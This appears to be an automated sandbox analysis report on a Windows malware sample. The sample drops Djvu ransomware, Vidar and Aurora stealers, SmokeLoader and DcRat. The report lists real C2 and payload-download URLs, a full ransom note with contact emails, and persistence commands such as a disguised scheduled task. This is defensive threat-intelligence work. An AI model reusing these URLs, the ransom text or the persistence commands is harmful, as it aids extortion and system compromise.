Resubmissions

09/01/2023, 12:46 UTC

230109-pzzzkaeb73 10

31/12/2022, 16:26 UTC

221231-txqekahh85 10

31/12/2022, 16:11 UTC

221231-tnc3wahh62 10

Analysis

  • max time kernel
    300s
  • max time network
    394s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/01/2023, 12:46 UTC

General

  • Target

    2f7a15691c51124019ccf5cbde2f399e52164f645b70bf4aaab596391146bb7f.exe

  • Size

    262KB

  • MD5

    a58ba818715cbcd50fff388b246e04d1

  • SHA1

    52ebdb14a8e3d61ffc6b3df3d76c4434733ea7de

  • SHA256

    2f7a15691c51124019ccf5cbde2f399e52164f645b70bf4aaab596391146bb7f

  • SHA512

    d6a98a816a0e5561128d674371f130cf43b68bc4c350866b20d1eac970e4c5aa4db53badec16dc27df3695e97d2bdb6e6fa8ae72981324671c060457c03339ee

  • SSDEEP

    3072:MlLntn1Y9zL3g7foklrmRQXN7SCzyLgCmN6kb5vfOxOvlmqrzn8f227hZY:sneL3qocb7SufCJ4SOYcn8rZY

Malware Config

Extracted

Family

djvu

C2

http://spaceris.com/lancer/get.php

Attributes
  • extension

    .zouu

  • offline_id

    7hl6KB3alcoZ6n4DhS2rApCezkIMzShntAiXWMt1

  • payload_url

    http://uaery.top/dl/build2.exe

    http://spaceris.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-N3pXlaPXFm Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0631JOsie

rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4OJbv2r9mpVICFGwdqr1
3
Q3YKwH6xKktJg2nuVbkcHSqvTUtmxdj8tdlUt7RPWppLqHkScFsp7lNxTEytfFvn
4
SgkdYLPdUcYD4ColyqmqPkegQ/S+/oKxPjx6CKyL8eP24L0AIWHBLLkqmsmmBxrd
5
m83aMMx1PQHv99wIZjMUFi41N5tQvmAmxrLdwFdLRZXl+4qVs5pcdzeTnrjCyrgQ
6
fRoBEO+xiRYSAftH+V5t8H+Y5UBGx1ov81BaW/cXPBxSL9qBHePClF4YsqJdk8QS
7
Fif1DM3NLeqb4Biu65GzvH1c9QpVD71Jge7bXyI4pc6Axn4nJ/dFB22HR3U+I5Io
8
WwIDAQAB
9
-----END PUBLIC KEY-----

Extracted

Family

aurora

C2

82.115.223.77:8081

Extracted

Family

vidar

Version

1.8

Botnet

19

C2

https://t.me/year2023start

https://steamcommunity.com/profiles/76561199467421923

Attributes
  • profile_id

    19

Signatures

  • Aurora

    Aurora is a crypto wallet stealer written in Golang.

  • DcRat 5 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detected Djvu ransomware 10 IoCs
  • Detects Smokeloader packer 2 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 18 IoCs
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 5 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 40 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 8 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 22 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2f7a15691c51124019ccf5cbde2f399e52164f645b70bf4aaab596391146bb7f.exe
    "C:\Users\Admin\AppData\Local\Temp\2f7a15691c51124019ccf5cbde2f399e52164f645b70bf4aaab596391146bb7f.exe"
    1⤵
    • DcRat
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:4136
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:1760
  • C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -pss -s 476 -p 4896 -ip 4896
    1⤵
      PID:4400
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 4896 -s 2472
      1⤵
      • Program crash
      PID:3100
    • C:\Users\Admin\AppData\Local\Temp\E738.exe
      C:\Users\Admin\AppData\Local\Temp\E738.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:720
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 720 -s 1252
        2⤵
        • Program crash
        PID:3920
    • C:\Users\Admin\AppData\Local\Temp\E95C.exe
      C:\Users\Admin\AppData\Local\Temp\E95C.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4780
    • C:\Users\Admin\AppData\Local\Temp\EE4F.exe
      C:\Users\Admin\AppData\Local\Temp\EE4F.exe
      1⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:1572
    • C:\Users\Admin\AppData\Local\Temp\F17C.exe
      C:\Users\Admin\AppData\Local\Temp\F17C.exe
      1⤵
      • Executes dropped EXE
      PID:3856
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 340
        2⤵
        • Program crash
        PID:1184
    • C:\Users\Admin\AppData\Local\Temp\F4F8.exe
      C:\Users\Admin\AppData\Local\Temp\F4F8.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:3576
      • C:\Users\Admin\AppData\Local\Temp\F4F8.exe
        C:\Users\Admin\AppData\Local\Temp\F4F8.exe
        2⤵
        • DcRat
        • Executes dropped EXE
        • Checks computer location settings
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:748
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Users\Admin\AppData\Local\1843ef78-7b18-4241-a3da-b93e861de0c2" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          3⤵
          • Modifies file permissions
          PID:4728
        • C:\Users\Admin\AppData\Local\Temp\F4F8.exe
          "C:\Users\Admin\AppData\Local\Temp\F4F8.exe" --Admin IsNotAutoStart IsNotTask
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1284
          • C:\Users\Admin\AppData\Local\Temp\F4F8.exe
            "C:\Users\Admin\AppData\Local\Temp\F4F8.exe" --Admin IsNotAutoStart IsNotTask
            4⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:4176
            • C:\Users\Admin\AppData\Local\9d87f84d-b658-43a1-9daf-8de6b126c79b\build2.exe
              "C:\Users\Admin\AppData\Local\9d87f84d-b658-43a1-9daf-8de6b126c79b\build2.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:3012
              • C:\Users\Admin\AppData\Local\9d87f84d-b658-43a1-9daf-8de6b126c79b\build2.exe
                "C:\Users\Admin\AppData\Local\9d87f84d-b658-43a1-9daf-8de6b126c79b\build2.exe"
                6⤵
                • Executes dropped EXE
                • Checks computer location settings
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2100
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\9d87f84d-b658-43a1-9daf-8de6b126c79b\build2.exe" & exit
                  7⤵
                    PID:2684
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 6
                      8⤵
                      • Delays execution with timeout.exe
                      PID:4548
              • C:\Users\Admin\AppData\Local\9d87f84d-b658-43a1-9daf-8de6b126c79b\build3.exe
                "C:\Users\Admin\AppData\Local\9d87f84d-b658-43a1-9daf-8de6b126c79b\build3.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:3704
                • C:\Windows\SysWOW64\schtasks.exe
                  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                  6⤵
                  • DcRat
                  • Creates scheduled task(s)
                  PID:3900
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3856 -ip 3856
        1⤵
          PID:3720
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 720 -ip 720
          1⤵
            PID:3904
          • C:\Users\Admin\AppData\Local\Temp\4F2E.exe
            C:\Users\Admin\AppData\Local\Temp\4F2E.exe
            1⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:2768
            • C:\Users\Admin\AppData\Roaming\venuzye.exe
              "C:\Users\Admin\AppData\Roaming\venuzye.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:368
              • C:\Windows\System32\Wbem\wmic.exe
                wmic os get Caption
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4208
              • C:\Windows\system32\cmd.exe
                cmd /C "wmic path win32_VideoController get name"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:792
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  4⤵
                    PID:2188
                • C:\Windows\system32\cmd.exe
                  cmd /C "wmic cpu get name"
                  3⤵
                    PID:3252
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic cpu get name
                      4⤵
                        PID:3596
                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                  1⤵
                  • Executes dropped EXE
                  PID:4604
                  • C:\Windows\SysWOW64\schtasks.exe
                    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                    2⤵
                    • DcRat
                    • Creates scheduled task(s)
                    PID:4984
                • C:\Users\Admin\AppData\Local\Temp\B4A0.exe
                  C:\Users\Admin\AppData\Local\Temp\B4A0.exe
                  1⤵
                  • Executes dropped EXE
                  PID:4452
                  • C:\Windows\SysWOW64\rundll32.exe
                    "C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\Wtfoiq.tmp",Iyidwoiowsw
                    2⤵
                    • Blocklisted process makes network request
                    • Sets DLL path for service in the registry
                    • Sets service image path in registry
                    • Loads dropped DLL
                    • Accesses Microsoft Outlook accounts
                    • Accesses Microsoft Outlook profiles
                    • Suspicious use of SetThreadContext
                    • Drops file in Program Files directory
                    • Checks processor information in registry
                    • Modifies system certificate store
                    • outlook_office_path
                    • outlook_win_path
                    PID:2532
                    • C:\Windows\system32\rundll32.exe
                      "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 15570
                      3⤵
                        PID:3336
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
                        3⤵
                          PID:3324
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
                          3⤵
                            PID:1860
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 320
                          2⤵
                          • Program crash
                          PID:2680
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4452 -ip 4452
                        1⤵
                          PID:5064
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe"
                          1⤵
                          • Enumerates system info in registry
                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                          PID:3848
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x120,0x124,0xd4,0x128,0x7ffa6e634f50,0x7ffa6e634f60,0x7ffa6e634f70
                            2⤵
                              PID:3948
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1704 /prefetch:2
                              2⤵
                                PID:4808
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2060 /prefetch:8
                                2⤵
                                  PID:5036
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2332 /prefetch:8
                                  2⤵
                                    PID:3820
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3000 /prefetch:1
                                    2⤵
                                      PID:4612
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:1
                                      2⤵
                                        PID:2256
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:1
                                        2⤵
                                          PID:976
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4500 /prefetch:8
                                          2⤵
                                            PID:1020
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4564 /prefetch:8
                                            2⤵
                                              PID:4204
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4816 /prefetch:8
                                              2⤵
                                                PID:528
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4632 /prefetch:8
                                                2⤵
                                                  PID:3200
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5024 /prefetch:8
                                                  2⤵
                                                    PID:3284
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5016 /prefetch:8
                                                    2⤵
                                                      PID:2096
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5212 /prefetch:8
                                                      2⤵
                                                        PID:2880
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5116 /prefetch:8
                                                        2⤵
                                                          PID:4536
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
                                                          2⤵
                                                            PID:5028
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:1
                                                            2⤵
                                                              PID:4136
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5020 /prefetch:8
                                                              2⤵
                                                                PID:224
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
                                                                2⤵
                                                                  PID:2544
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6052 /prefetch:8
                                                                  2⤵
                                                                    PID:1088
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5556 /prefetch:8
                                                                    2⤵
                                                                      PID:1788
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
                                                                      2⤵
                                                                        PID:5096
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2840 /prefetch:8
                                                                        2⤵
                                                                          PID:2032
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:8
                                                                          2⤵
                                                                            PID:4028
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:8
                                                                            2⤵
                                                                              PID:380
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2704 /prefetch:8
                                                                              2⤵
                                                                                PID:2088
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1
                                                                                2⤵
                                                                                  PID:3928
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3140 /prefetch:1
                                                                                  2⤵
                                                                                    PID:2880
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5316 /prefetch:8
                                                                                    2⤵
                                                                                      PID:2612
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2212 /prefetch:8
                                                                                      2⤵
                                                                                        PID:396
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2608 /prefetch:1
                                                                                        2⤵
                                                                                          PID:2680
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
                                                                                          2⤵
                                                                                            PID:992
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1044 /prefetch:8
                                                                                            2⤵
                                                                                              PID:1176
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1608 /prefetch:8
                                                                                              2⤵
                                                                                                PID:204
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3544 /prefetch:2
